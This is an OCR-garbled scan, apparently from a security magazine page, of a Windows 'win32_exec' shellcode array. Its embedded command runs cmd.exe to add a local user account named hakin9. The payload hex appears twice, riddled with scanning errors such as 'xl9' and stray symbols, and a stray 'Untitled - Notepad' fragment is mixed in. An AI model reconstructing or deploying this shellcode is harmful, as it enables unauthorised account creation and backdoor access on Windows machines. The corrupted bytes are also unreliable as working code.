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Windows Execute Command

/* win32_exec - EXITFUNC=process CMD=cmd.exe unsigned char scode[] =


/c net user hakin9 hakin9 /add fifi net loce

"\xl9\xe7\x78\x83\xe r,\ xf 5\ x92\x9b\ x7d\ xY "\x42\x2d\x6c\x79\x2 xc8\ xdb\ xOc\ x8c\ xd "\x42\xl5\xac\xf3\x< xcd\ xda\ xd6\ xbS\ x« xb9\ x05\ x4a\ xf 3\ x« "\xf5\x46\xd6\x8e\x? r,\ xba\ x71\ x7f \ x86\ x< "\xe9\x3 6\x84\x53\x? r,\ xaO\ x77\ xde\ x53\ x? "\xef\x3f\xc7\xl6\x? xb9\ x39\ x86\ xlc\ x«

Untitled - Notepad

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/* win32_exec - EXlTFUNC=process CMD=cmd.exe /c net user hakin9 hak'^ unsigned char scode[] =

"\x3 3\xc9\x83\xe9\xca\xd9\xee\xd9\x74\x24\xf4\x 5 b\x81\x73\xl3\xc9"

"\xl9\x e 7\x 7 8\x 8 3\x e b\xf c\x e 2\xf4\x 35\xfI\xa3\x78\xc9\xl9\x6c\x3 d"

"\xf 5\x 9 2\x 9 b\x 7 d\x bl\xl8\x 0 8\xf 3\x 8 6\x Gl\x 6 c\x 27\xe9\xl8\x0c\x31"

"\x42\x2d\x6c\x79\x27\x2 8\x2 7\xel\x6 5\x9d\x2 7\x0c\xce\xd8\x2 d\x7 5"

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11 \xf 5\x4 6\x d 6\x 8 e\x a 9\x4 f\x 6 e\x 8 0\x4 a\x d 9\x 9 c\x 2 8\x al\x 6 7\x 3 f\x 9 a" "\xba\x71\x7f\x86\x4 3\xl7\xb0\x87\x2 e\x7a\x8a\xlc\xe7\x7c\x9f\xld" "\xe9\x36\x84\x5 8\xa7\x7c\x93\x 5 8\xbc\x6a\x82\x0a\xe9\x71\x86\xl3" "\xa0\x77\xde\x 5 8\xal\x78\x8c\xll\xa7\x2 0\xc7\x 5 7\xa8\x7d\x83\x 5 8"

11 \x ef\x 3 f\x c 7\xl6\x a c\x 6 d\x c 7\xl4\x a 6\x 7 a\x 8 6\xl4\x a e\x 6 b\x 8 8\x Od" "\xb9\x39\x 8 6\xlc\x a4\x 7 0\x 8 9\xll\x b a\x 6 d\x 95\xl9\xbd\x76\x9 5\x0b"

"\xe9\x 3 6\x 8 6\xlc\x a d\x 3 9\x 8f\xl9\x a 2\x 7 0\x 8 9\x4l\x c 9\xl9\x e 7\x 7 8";    _




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